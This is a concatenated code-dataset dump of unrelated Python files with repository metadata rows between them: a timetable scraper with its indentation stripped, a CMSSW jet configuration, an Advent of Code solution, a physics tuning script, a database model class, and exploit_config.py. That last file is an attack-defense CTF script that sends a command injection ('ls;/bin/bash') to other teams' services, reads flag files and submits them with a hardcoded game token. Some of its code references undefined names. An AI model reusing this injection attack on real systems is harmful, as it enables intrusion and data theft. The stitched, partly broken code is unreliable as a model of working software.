# Grab the top section and split it by a single return \n
topSection = mainSections[0].split("\n")
# Initialize variables, assume that nothing is cancelled or changed
isChangedOrCancelled = 0
isCancelled = False
isChanged = False
# If the first item in the top section doesn't contain 'til',
# it must be either cancelled or changed
if not "til" in topSection[0]:
isChangedOrCancelled = 1
# If it says 'Aflyst!'
if "Aflyst!" in topSection[0]:
# It must be cancelled
isCancelled = True
else:
# Otherwise it must be changed
isChanged = True
if not timeGroups is None:
startTime = datetime.fromtimestamp(mktime(time.strptime("%s %s %s %s %s" % (timeGroups.group("start_hour"),timeGroups.group("start_minute"), dayOfWeek , timeWeek, year),"%H %M %w %W %Y")))
endTime = datetime.fromtimestamp(mktime(time.strptime("%s %s %s %s %s" % (timeGroups.group("end_hour"),timeGroups.group("end_minute"), dayOfWeek , timeWeek, year),"%H %M %w %W %Y")))
else:
# Grab the date sections, fx: "15/5-2013 15:30 til 17:00"
dateSections = topSection[0+isChangedOrCancelled].split(" ")
# Grab the date, being the first (0) section
if len(dateSections) == 4:
startDateSection = dateSections[0]
endDateSection = dateSections[0]
startTimeSection = dateSections[1]
endTimeSection = dateSections[3]
else:
startDateSection = dateSections[0]
endDateSection = dateSections[3]
startTimeSection = dateSections[1]
endTimeSection = dateSections[4]
currentTimezone = timezone("Europe/Copenhagen")
alternativeDayProg = re.compile(r"(?P<day>[0-9]*)/(?P<month>[0-9]*)-(?P<year>[0-9]*)")
alternativeStartDayGroups = alternativeDayProg.match(startDateSection.strip())
alternativeEndDayGroups = alternativeDayProg.match(endDateSection.strip())
startTime = datetime.strptime("%s/%s-%s %s" % (functions.zeroPadding(alternativeStartDayGroups.group("day")), functions.zeroPadding(alternativeStartDayGroups.group("month")), alternativeStartDayGroups.group("year"), startTimeSection.strip()), "%d/%m-%Y %H:%M")
endTime = datetime.strptime("%s/%s-%s %s" % (functions.zeroPadding(alternativeEndDayGroups.group("day")), functions.zeroPadding(alternativeEndDayGroups.group("month")), alternativeEndDayGroups.group("year"), endTimeSection.strip()), "%d/%m-%Y %H:%M")
roomText = ""
try:
if not "rer:" in topSection[3 + isChangedOrCancelled]:
room = topSection[3 + isChangedOrCancelled].strip("Lokale: ").encode('utf-8').replace("r: ","")
except IndexError:
pass
if sameDay(startTime, dayOfWeek, timeWeek, year):
if type == "private":
timeElements.append({
"text" : unicode(timetableElement.text),
"activity_id" : groups.group("activity_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "outgoing_censor":
timeElements.append({
"text" : unicode(timetableElement.text),
"outbound_censor_id" : groups.group("outbound_censor_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "exam":
timeElements.append({
"text" : unicode(timetableElement.text),
"test_team_id" : groups.group("test_team_id"),
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"school_id" : groups.group("school_id")
})
elif type == "school":
# Add to the list
timeElements.append({
"text" : unicode(timetableElement.text),
"activity_id" : groups.group("activity_id"),
"status" : "changed" if "s2changed" in div["class"] else "cancelled" if "s2cancelled" in div["class"] else "normal",
"teachers" : teachers,
"teams" : teams,
"startTime" : startTime,
"endTime" : endTime,
"type" : type,
"location_text" : unicode(div.text),
"room_text" : unicode(roomText),
"school_id" : groups.group("school_id")
})
return {
"status" : "ok",
"timetable" : timeElements,
"information" : generalInformation,
"module_info" : moduleInfo,
"headers" : headers,
"term" : {
"value" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"years_string" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0].text
}
} | [
"boh1996@gmail.com"
] | boh1996@gmail.com |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2 | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py | 43faa9de8f5e464f8f33daa997f0ff65a0071833 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,457 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
ak6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("ak6HiGenJetsCleaned")
)
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
ak6Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6CaloJets"),
payload = "AK6Calo_HI"
)
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
genJetMatch = cms.InputTag("ak6Calomatch"),
genPartonMatch = cms.InputTag("ak6Caloparton"),
jetIDMap = cms.InputTag("ak6CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
genjetTag = 'ak6HiGenJetsCleaned',
rParam = 0.6,
matchJets = cms.untracked.bool(True),
matchTag = 'akVs6CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
ak6CaloJetSequence_mc = cms.Sequence(
ak6Calomatch
*
ak6Caloparton
*
ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc
ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
| [
"dgulhan@cern.ch"
] | dgulhan@cern.ch |
3c384528e3389e5fcb5e833afc92533aefd3ebf6 | 6ed76db38374c84161efcf539920756f00fa334c | /aoc2019/day6.py | a89ef49602824bd982eb47a6cd05c5b4c2cc54f1 | [] | no_license | will-snavely/adventofcode | 0eb424bd2887610af4cdc8fa7bbe6db19c94655e | 8e6f66416d508b9042bb78cb931391887fc2da6d | refs/heads/master | 2023-07-23T19:44:24.621404 | 2023-07-13T15:57:04 | 2023-07-13T15:57:04 | 328,174,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | import collections
test_inputs = [
"inputs/day6"
]
def build_orbit_graph(rules):
    """Parse "CENTER)SATELLITE" orbit rules into two maps.

    Returns (children, parent) where children maps a node to the list of
    bodies orbiting it, and parent maps each body to what it orbits.
    """
    children = collections.defaultdict(list)
    parent = {}
    for rule in rules:
        pieces = rule.split(")")
        children[pieces[0]].append(pieces[1])
        parent[pieces[1]] = pieces[0]
    return children, parent
def count_orbits(children, node, depth):
    """Sum the depths of every node in the subtree rooted at *node*.

    *node* itself contributes *depth*; each level below adds one more.
    Implemented iteratively with an explicit stack instead of recursion.
    """
    total = 0
    pending = [(node, depth)]
    while pending:
        current, level = pending.pop()
        total += level
        for child in children[current]:
            pending.append((child, level + 1))
    return total
def path_to_root(parent, start):
    """Return the chain of nodes from *start* up to and including "COM"."""
    chain = [start]
    while chain[-1] != "COM":
        chain.append(parent[chain[-1]])
    return chain
def process(path):
    """Solve both parts of the orbit puzzle for the map stored at *path*."""
    print("Input:", path)
    with open(path) as handle:
        orbit_rules = [entry.strip() for entry in handle.readlines()]
        children, parent = build_orbit_graph(orbit_rules)
        # Part 1: total count of direct and indirect orbits from COM.
        print("\tPart 1:", count_orbits(children, "COM", 0))
        # Part 2: minimal orbital transfers between YOU and SAN, i.e. the
        # distance to their lowest common ancestor from each side, minus
        # the two endpoints themselves.
        you_path = path_to_root(parent, "YOU")
        santa_path = path_to_root(parent, "SAN")
        santa_nodes = set(santa_path)
        common = None
        for node in you_path:
            if node in santa_nodes:
                common = node
                break
        transfers = you_path.index(common) + santa_path.index(common) - 2
        print("\tPart 2:", transfers)
def main():
    """Run the solver over every configured input file."""
    for input_path in test_inputs:
        process(input_path)
| [
"will.snavely@protonmail.com"
] | will.snavely@protonmail.com |
5a75b711fb29537898981bed0b06a74806f2c9fd | d6ed05e23faa20beb5e47624870608a9219ea81c | /TuningTools_old/scripts/analysis_scripts/dev/Trigger_20161214_20_7_7_3_LHbins/create_data.py | 085d2aa684d3438748ca6040bac02c4a8c3587d0 | [] | no_license | kaducovas/ringer | f6495088c0d54d622dcc707333b4c2fbf132d65f | 603311caab016ad0ef052ea4fcc605c5ac4e494b | refs/heads/master | 2020-06-16T21:37:15.228364 | 2019-07-08T01:29:57 | 2019-07-08T01:29:57 | 195,477,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,462 | py | #!/usr/bin/env python
import numpy as np
useLHBins = True
if useLHBins:
etaBins = [0.00,0.60,0.80,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
etBins = [15,20,30,40,50000]
# Thresholds
thres_lh_etavect = [0,0.6,0.8,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
thres_lh_etvect = [4,7,10,15,20,25,30,35,40,45,50]
tight20160701 = np.array( [[0.484,0.532,0.490,0.466,0.252,0.510,0.494,0.384,0.349], # 4 GeV
[0.531,0.599,0.557,0.532,0.381,0.575,0.569,0.454,0.403], # 7 GeV
[0.594,0.641,0.589,0.572,0.416,0.587,0.580,0.554,0.472], # 10 GeV
[0.700,0.692,0.680,0.675,0.589,0.687,0.690,0.624,0.671], # 15 GeV
[0.709,0.686,0.694,0.689,0.646,0.701,0.718,0.677,0.734], # 20 GeV
[0.752,0.749,0.736,0.730,0.561,0.747,0.744,0.708,0.745], # 25 GeV
[0.776,0.773,0.761,0.760,0.614,0.752,0.769,0.728,0.795], # 30 GeV
[0.794,0.791,0.786,0.783,0.629,0.780,0.785,0.766,0.792], # 35 GeV
[0.803,0.795,0.782,0.792,0.613,0.783,0.800,0.780,0.820], # 40 GeV
[0.808,0.795,0.793,0.812,0.647,0.798,0.814,0.799,0.853]] ) * 100. # 45 GeV
medium20160701 = np.array([[0.667,0.674,0.652,0.617,0.343,0.609,0.592,0.576,0.524], # 4 GeV
[0.670,0.737,0.715,0.679,0.527,0.701,0.683,0.587,0.537], # 7 GeV
[0.751,0.778,0.746,0.712,0.549,0.721,0.713,0.707,0.649], # 10 GeV
[0.815,0.804,0.782,0.781,0.677,0.794,0.764,0.742,0.757], # 15 GeV
[0.833,0.810,0.813,0.811,0.735,0.823,0.814,0.802,0.815], # 20 GeV
[0.863,0.860,0.848,0.848,0.656,0.842,0.834,0.827,0.817], # 25 GeV
[0.886,0.873,0.870,0.864,0.681,0.835,0.861,0.829,0.848], # 30 GeV
[0.897,0.894,0.886,0.875,0.714,0.876,0.867,0.842,0.866], # 35 GeV
[0.900,0.891,0.887,0.882,0.708,0.883,0.879,0.862,0.896], # 40 GeV
[0.894,0.895,0.893,0.886,0.719,0.882,0.888,0.869,0.913]] ) * 100. # 45 GeV
loose20160701 = np.array( [[0.813,0.810,0.807,0.781,0.536,0.758,0.739,0.750,0.709], # 4 GeV
[0.819,0.816,0.813,0.787,0.670,0.808,0.789,0.753,0.711], # 7 GeV
[0.853,0.850,0.827,0.801,0.692,0.837,0.818,0.816,0.777], # 10 GeV
[0.886,0.882,0.869,0.858,0.752,0.854,0.855,0.823,0.802], # 15 GeV
[0.897,0.888,0.885,0.884,0.791,0.880,0.871,0.853,0.875], # 20 GeV
[0.921,0.913,0.905,0.894,0.708,0.894,0.875,0.858,0.853], # 25 GeV
[0.934,0.930,0.922,0.912,0.735,0.908,0.909,0.866,0.869], # 30 GeV
[0.942,0.940,0.937,0.930,0.779,0.931,0.931,0.905,0.913], # 35 GeV
[0.947,0.945,0.941,0.934,0.762,0.935,0.936,0.922,0.919], # 40 GeV
[0.951,0.949,0.948,0.943,0.774,0.940,0.944,0.926,0.945]]) * 100. # 45 GeV
veryloose20160701 = np.array([[0.896,0.893,0.890,0.884,0.719,0.875,0.866,0.859,0.821], # 4 GeV
[0.928,0.925,0.922,0.916,0.758,0.906,0.897,0.890,0.854], # 7 GeV
[0.928,0.925,0.922,0.915,0.766,0.906,0.897,0.889,0.856], # 10 GeV
[0.958,0.950,0.932,0.925,0.829,0.920,0.925,0.909,0.876], # 15 GeV
[0.966,0.957,0.955,0.943,0.844,0.943,0.929,0.916,0.904], # 20 GeV
[0.979,0.975,0.962,0.961,0.780,0.956,0.942,0.929,0.919], # 25 GeV
[0.988,0.985,0.980,0.973,0.803,0.961,0.956,0.923,0.922], # 30 GeV
[0.988,0.986,0.984,0.981,0.834,0.976,0.971,0.963,0.960], # 35 GeV
[0.990,0.988,0.987,0.983,0.835,0.978,0.974,0.970,0.972], # 40 GeV
[0.991,0.989,0.988,0.984,0.833,0.979,0.974,0.966,0.976]]) * 100. # 45 GeV
else:
etBins = [15, 20, 30, 40, 50, 500000 ]
etaBins = [0, 0.8 , 1.37, 1.54, 2.5]
tight20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[0.849, 0.83898649, 0.7945, 0.82856316] # Et 15
,[0.866025, 0.85846486, 0.7975, 0.85683684] # Et 20
,[0.892305, 0.88658649, 0.8109, 0.87986105] # Et 30
,[0.9014375, 0.89668919, 0.815, 0.89674474] # Et 40
,[0.902375, 0.90035135, 0.8235, 0.90092632]])*100. # Et 50
medium20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.906125, 0.8907973, 0.8385, 0.88125263] # Et 15
,[ 0.924125, 0.91683784, 0.8438, 0.91210316] # Et 20
,[ 0.944885, 0.93741676, 0.84908, 0.92400337] # Et 30
,[ 0.948, 0.94378378, 0.85675, 0.93723947] # Et 40
,[ 0.947125, 0.94508108, 0.8595, 0.93848421]])*100. # Et 50
loose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.9425, 0.93227027, 0.876, 0.9196 ] # Et 15
,[ 0.95465, 0.94708108, 0.8706, 0.93477684] # Et 20
,[ 0.96871, 0.96318919, 0.87894, 0.95187642] # Et 30
,[ 0.97425, 0.97103378, 0.884, 0.96574474] # Et 40
,[ 0.97525, 0.97298649, 0.887, 0.96703158]])*100. # Et 50
veryloose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.978, 0.96458108, 0.9145, 0.95786316]
,[ 0.98615, 0.97850541, 0.9028, 0.96738947]
,[ 0.99369, 0.9900427, 0.90956, 0.97782105]
,[ 0.995, 0.99293919, 0.917, 0.98623421]
,[ 0.99525, 0.99318919, 0.9165, 0.98582632]])*100.
#etaBins = [0, 0.8]
def standardRef( val ):
  """Return the reference efficiency table as a numpy array, unchanged."""
  table = np.array(val)
  return table
def transformToEFCalo( val ):
  """Shift each efficiency halfway toward 1: val + (1 - val) / 2.

  Given the name, this presumably models the efficiency recovered at the
  EFCalo step -- confirm against the tuning documentation.
  """
  arr = np.array(val)
  return arr + (1 - arr) / 2
def mergeEffTable( val ):
  """Collapse the fine-binned (10 Et x 9 eta) efficiency table into the
  4 coarse Et bins used for tuning (15-20, 20-30, 30-40, 40-50+ GeV).

  The fine rows run 4,7,10,15,20,25,30,35,40,45 GeV, so the 15 GeV row is
  index 3.  The weights below are the approximate statistics fractions of
  each fine Et row inside a coarse bin.

  Keyword arguments:
  val -- numpy array of shape (10, 9): efficiency per (Et, eta) fine bin

  Returns a numpy array of shape (4, 9).
  """
  # fix: removed a large block of dead, commented-out eta-merging code and
  # turned the mutually exclusive etIdx tests into an if/elif chain.
  import itertools
  shorterEffTable = np.zeros( shape=(4,9) )
  for etIdx, etaIdx in itertools.product( range(4), range(9) ):
    refIdx = etIdx + 3
    if etIdx == 0: # 15 up to 20 GeV: taken directly
      shorterEffTable[etIdx,etaIdx] = val[refIdx,etaIdx]
    elif etIdx == 1: # merge the 20 and 25 GeV rows
      shorterEffTable[etIdx,etaIdx] = (val[refIdx,etaIdx]*.4 + val[refIdx+1,etaIdx]*.6)
    elif etIdx == 2: # merge the 30 and 35 GeV rows
      shorterEffTable[etIdx,etaIdx] = (val[refIdx+1,etaIdx]*.48 + val[refIdx+2,etaIdx]*.52)
    elif etIdx == 3: # merge the 40 and 45 GeV rows
      shorterEffTable[etIdx,etaIdx] = (val[refIdx+2,etaIdx]*.5 + val[refIdx+3,etaIdx]*.5)
  return shorterEffTable
#for ref in (veryloose20160701, loose20160701, medium20160701, tight20160701):
ref = veryloose20160701
from RingerCore import traverse
if useLHBins:
pdrefs = mergeEffTable( ref )
else:
pdrefs = ref
print pdrefs
pfrefs = np.array( [[0.05]*len(etaBins)]*len(etBins) )*100. # 3 5 7 10
efficiencyValues = np.array([np.array([refs]) for refs in zip(traverse(pdrefs,tree_types=(np.ndarray),simple_ret=True)
,traverse(pfrefs,tree_types=(np.ndarray),simple_ret=True))]).reshape(pdrefs.shape + (2,) )
print efficiencyValues
basePath = '/home/wsfreund/CERN-DATA'
sgnInputFile = 'user.jodafons.mc15_13TeV.361106.PowhegPythia8EvtGen_AZNLOCTEQ6L1_Zee.merge.AOD.e3601_s2876_r7917_r7676.dump.trigPB.p0200_GLOBAL/'
bkgInputFile = 'user.jodafons.mc15_13TeV.423300.Pythia8EvtGen_A14NNPDF23LO_perf_JF17.merge.AOD.e3848_s2876_r7917_r7676.dump.trigEL.p0201_GLOBAL/'
outputFile = 'mc15_13TeV.361106.423300.sgn.trigegprobes.bkg.vetotruth.trig.l2calo.eg.std.grid.veryloose'
treePath = ["HLT/Egamma/Expert/support/probes",
"HLT/Egamma/Expert/support/trigger"]
#crossValPath = 'crossValid_5sorts.pic.gz'
#from TuningTools import CrossValidArchieve
#with CrossValidArchieve( crossValPath ) as CVArchieve:
# crossVal = CVArchieve
# del CVArchieve
import os.path
from TuningTools import Reference, RingerOperation
from TuningTools import createData
from RingerCore import LoggingLevel
createData( sgnFileList = os.path.join( basePath, sgnInputFile ),
bkgFileList = os.path.join( basePath, bkgInputFile ),
ringerOperation = RingerOperation.L2Calo,
referenceSgn = Reference.AcceptAll,
referenceBkg = Reference.Truth,
treePath = treePath,
pattern_oFile = outputFile,
#nClusters = 1000,
etBins = etBins,
etaBins = etaBins,
toMatlab = True,
efficiencyValues = efficiencyValues,
plotProfiles = True,
supportTriggers = True,
doMonitoring = False,
#level = LoggingLevel.VERBOSE
)
| [
"kaducovas@gmail.com"
] | kaducovas@gmail.com |
5973aee2804c87bac3f687c0a8f0b48da17ef309 | 573cb6d132e1a6962e56a1808aa10d4c09b85a84 | /exploit_config.py | df627fc8e8f118fab42f72855b322b6a8b1521f6 | [] | no_license | pramann1/dark-matter | 8cb75b1c3bf17fd58c810238e80256bb95506ec6 | 047622ebf03871a633104c3e2602152908f05341 | refs/heads/master | 2022-04-08T15:27:43.374525 | 2020-03-01T02:03:59 | 2020-03-01T02:03:59 | 241,284,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,895 | py | import os
import socket
import select
import sys
import threading
import hashlib
import time
import re
import json
import random
import string
from pwn import *
from timeout import timeout
from collections import defaultdict
import swpag_client
import requests
from bs4 import BeautifulSoup
from multiprocessing import Process, Manager
# Game/CTF connection settings.
game_link = 'http://34.195.187.175/'
game_token = 'd3711768d3edb770ab8da755709d176f'
# Ports of the services we attack.
service_port = [10005]
# Restrict attacks to these team names; an empty list means "all teams".
other_teams = []
# Per-service-port list of enabled-exploit flags, parallel to the exploit
# table `map` below.
# fix: `{[10005: True]}` was a syntax error; usage elsewhere iterates
# enumerate(vulnerability[port]) alongside map[port][i], so the intended
# structure is a dict of lists keyed by port.
vulnerability = {10005: [True]}
def vulnerability1(host, port, flag_id):
    """Exploit the service on the target via a command injection, then read
    the flag out of a config file.

    Keyword arguments:
    host    -- hostname/IP of the victim service
    port    -- TCP port of the victim service
    flag_id -- identifier used to name the config file holding the flag

    Returns a 16-character string sliced from the last line received.
    NOTE(review): the menu choices ("d", "s", "l") and the fixed slice
    offsets (data[-8:-2], data[-17:-1]) assume an exact service protocol
    and flag layout -- confirm against the live service.
    """
    c = remote(host,port)
    # Skip the banner/menu lines.
    c.recvline()
    c.recvline()
    c.recvline()
    c.recvline()
    c.recvline()
    # Choose the vulnerable option and inject a shell via the value field.
    c.sendline("d")
    c.recvline()
    c.sendline("value1")
    c.recvline()
    c.sendline("ls;/bin/bash")
    c.recvline()
    c.sendline("s")
    data=c.recvline()
    data=c.recvline()
    # Extract a 6-character filename from a fixed position in the output.
    filename= data[-8:-2].decode("utf-8")
    data=c.recvline()
    data=c.recvline()
    c.sendline("l")
    c.recvline()
    c.sendline("config_"+filename)
    data = c.recvline()
    # Dump the config file named after the flag id; the flag is on the
    # second line received back.
    c.sendline("cat config_"+ flag_id )
    data = c.recvline()
    data = c.recvline()
    c.close()
    return data[-17:-1].decode('utf-8')
map = {10005: [vulnerability1]}
team = swpag_client.Team(game_link, game_token)
def launch_vul(id, targ, svc):
    """Run every enabled exploit for service *svc* against one target.

    Keyword arguments:
    id   -- service identifier (unused here, kept for the caller's API)
    targ -- target dict with "team_name", "hostname", "port", "flag_id"
    svc  -- service port, the key into `vulnerability` and `map`

    NOTE(review): stolen flags are added to a module-level `flags` set
    (created inside tick_loop) -- confirm callers initialise it first.
    """
    team_name = targ["team_name"]
    hostname = targ["hostname"]
    port = targ["port"]
    flag_id = targ["flag_id"]
    if other_teams and team_name not in other_teams:
        return  # Not one of our targets; don't do anything here
    # fix: the loop referenced undefined names `svcid` and `enabled`;
    # the enable flag is the enumerated item and the key is the `svc` arg.
    for i, enabled in enumerate(vulnerability[svc]):
        if not enabled:
            continue
        exploit = map[svc][i]
        flag = exploit(hostname, port, flag_id)
        if flag is not None:
            print("Stole flag {0}!".format(flag))
            flags.add((team_name, flag))
            break
    else:
        print("Oops looks like other teams have patched")
tick1=0
def getServices():
    """Fetch the service list from the game server.

    fix: the original stored the result only in a local variable, while
    tick_loop() iterates a module-level `services` name that was never
    bound.  Publish it at module scope and also return it.
    """
    global services
    services = team.get_service_list()
    return services
def tick_loop(tick1):
    """Main attack loop: once per game tick, exploit every target for every
    service and submit the stolen flags.

    Keyword arguments:
    tick1 -- id of the last tick already processed

    Relies on module-level state: `services` (set by getServices()), the
    `vulnerability` enable table, the `map` exploit table and `team`.
    """
    while True:
        tick = team.get_tick_info()
        if tick["tick_id"] > tick1:
            # A new tick started: pause (except on the very first tick)
            # so the gamebot has time to plant fresh flags.
            wait = True
            if tick1 == 0:
                wait = False
            tick1 = tick["tick_id"]
            print("Tick1", tick1)
            if wait:
                time.sleep(10)
        else:
            # Still the same tick: poll again later.
            time.sleep(10)
            continue
        flags = set()
        for svc in services:
            svcid = svc["service_id"]
            svcport = svc["port"]
            targets = team.get_targets(svcid)
            for targ in targets:
                team_name = targ["team_name"]
                hostname = targ["hostname"]
                port = targ["port"]
                flag_id = targ["flag_id"]
                if other_teams and team_name not in other_teams:
                    continue
                # Try each enabled exploit until one yields a flag.
                for i, buf in enumerate(vulnerability[svcport]):
                    if not buf:
                        continue
                    flag = map[svcport][i](hostname, port, flag_id)
                    if flag is not None:
                        print("Stole flag {0}!".format(flag))
                        flags.add((team_name, flag))
                        break
                else:
                    print("Error!")  # fix: a stray quote made this line a syntax error
            # NOTE(review): submission runs after each service, re-sending
            # the accumulated set -- possibly meant to run once per tick.
            if flags:
                pctflist = list(flags)
                flaglist = [str(f[1]) for f in pctflist]
                print(flaglist)
                final_flag = team.submit_flag(flaglist)
                temp1 = {}
                for i, (t, flag) in enumerate(pctflist):
                    temp1[t] = (flag, final_flag[i])
                print("All flags here:", temp1)
            else:
                print("Error - no flags")
t_info = team.get_tick_info()
wait = int(info["approximate_seconds_left"])
while True:
while True:
try:
getServices()
tick_loop(tick1)
except Exception as e:
time.sleep(5)
| [
"noreply@github.com"
] | pramann1.noreply@github.com |
b05d0b27f1d6b15592926bb7c86aec1b7e8cc0cd | ce2c9e82b05e2cdf09bcf56d35efb2044e1950ec | /String/pratice2.py | 9e1ba576364699546971cd47ad6647cc31f8c607 | [] | no_license | imakash3011/PythonFacts | cb6423671680284e2fcdeb5442b3206ddd9f5e3a | c060f2ab917831afe5fd604a82d31a78ebf64f6f | refs/heads/master | 2023-02-27T12:20:49.045203 | 2021-02-05T14:51:40 | 2021-02-05T14:51:40 | 336,299,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # title
# st = "how are you"
# print(st.title())
# strip the start and end occrance of target
# st = "ppp how are youpppp"
# print(st.strip("p"))
# reverse a string
# st = "akash"
# print(st[::-1])
# repeat
# import itertools
# print(list(itertools.repeat("akash",5)))
# longest common substring (via difflib.SequenceMatcher)
# from difflib import SequenceMatcher
# ab = "abcdefght"
# bb = "abcdklete"
# seqMatch = SequenceMatcher(None, ab, bb)
# mtch = seqMatch.find_longest_match(0, len(ab), 0, len(bb))
# if mtch.size !=0:
# # print(mtch.a, mtch.a+mtch.size)
# print(ab[mtch.a : mtch.a + mtch.size])
# join the list
# s = ['p', 'a', 'g', 'e']
# print("".join(s))
# is title?
# st = "Welcome In India"
# res = st.istitle()
# print(res)
# Is digits
# n = "1212"
# ans = n.isdigit()
# print(ans)
# slicing the string
# st= 'hii how are you man'
# slc = st[3:8]
# print(slc)
# count the occurrences of a word in a line
# st = "welcome to geeks for geeks"
# cnt = st.count("geeks")
# print(cnt) | [
"imakashpatel3011@gmail.com"
] | imakashpatel3011@gmail.com |
46debb410fe143f995be88669f3ec46546a5c6dc | 55b324abdc2b07087253a834c26bb11557711d67 | /classes/Model.py | ce23fa51fd5be6d25546824e9fa52c7c6afb7ef0 | [] | no_license | milimi974/OC_Projet_5 | 795c41de6b950c130a3ce7191065af573f8d74f1 | 382f20c886817cb94ed5f59f5840c73235b7ab4b | refs/heads/master | 2021-05-06T13:24:25.577013 | 2017-12-27T22:34:02 | 2017-12-27T22:34:02 | 113,223,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,754 | py | #!/usr/bin/env python
# coding: utf-8
""" Module Parent for all class need access to BDD """
# load dependencies
from classes.Database import Database as DB
from classes.Functions import *
class Model(object):
""" That Class manage method for BDD """
def __init__(self, args={}):
""" Constructor
Method arguments:
args -- dict object attribute value
"""
# init attributes
setattr(self, 'PK_id', 0)
if hasattr(self, 'fields') and not self.fields == "" and args:
for field in self.fields:
if field in args:
v = args[field]
if hasattr(self, 'format_fields'):
v = parse_field(self.format_fields, field, v)
setattr(self, field, v)
@property
def __is_error(self):
""" Property tell if can send request to bdd """
# Check if table name set and not empty
if hasattr(self, 'table') and not self.table == "":
return False
return True
    def save(self):
        """ Insert this object into the database, or update its existing row.

        A positive ``PK_id`` means the row is already persisted, so an
        UPDATE is issued; otherwise ``PK_id`` is cleared and the row is
        INSERTed.  Does nothing when no table name is configured.
        """
        if not self.__is_error:
            fields = list(self.fields)
            table = str(self.table)
            if hasattr(self, 'PK_id') and int(self.PK_id) > 0:
                # Existing row: update it in place
                DB.update(table, fields, self,)
            else:
                # New row: clear any primary key so the database assigns one
                self.PK_id = None
                DB.save(table, fields, self)
    def find(self, request):
        """ Search the model's table and return every matching row.

        Keyword arguments:
        request -- dict of instructions for the database request
                   (e.g. 'fields' selection and 'where' clauses)

        Delegates to DB.search with the single-result flag set to False;
        self.__class__ is passed so results can be materialized as
        instances of this model.
        """
        table = str(self.table)
        format_fields = dict(self.format_fields)
        return DB.search(format_fields, table, request, False, self.__class__)
    def findone(self, request):
        """ Search the model's table and return a single matching row.

        Keyword arguments:
        request -- dict of instructions for the database request

        Same as find() but calls DB.search with the single-result flag
        set to True.
        """
        table = str(self.table)
        format_fields = dict(self.format_fields)
        return DB.search(format_fields , table, request, True, self.__class__)
def findjoin(self, table1, request, table2=None):
""" Method search join answer
Keyword arguments:
table1 -- str name of main table for JOIN
table2 -- str name join table
request -- dict of instructions for database request
"""
if not table2:
table2 = self.table
format_fields = dict(self.__class__.format_fields)
return DB.search(format_fields, table1, request, False, self.__class__, table2)
def bulk(self, data, update=False, tablename=None, fields=None):
""" method for saving a bulk data
Keyword arguments:
data -- list of product fields value
update -- boolean use active update action
-- for join table --
tablename -- string custom table
fields -- custom fields
"""
if not tablename:
tablename = str(self.table)
if not fields:
fields = list(self.fields)
if not update:
# Call method for save data
DB.save(tablename, fields, data)
else:
# Call method for update data
DB.update(tablename, fields, data)
def search_by(self, args):
""" Make a search on one field
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'all',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
return DB.search(format_fields, table, request, False, self.__class__)
def search_ids(self, args):
""" Make a search on one field
Keyword arguments:
args -- tuple
(
field -- str name of database field
value -- str || list
)
"""
request = {
'fields': 'PK_id',
'where': [
args,
]
}
table = str(self.table)
format_fields = dict(self.format_fields)
rep = DB.search(format_fields, table, request, False, self.__class__)
ids = []
if rep:
for el in rep:
ids.append(el.PK_id)
return ids
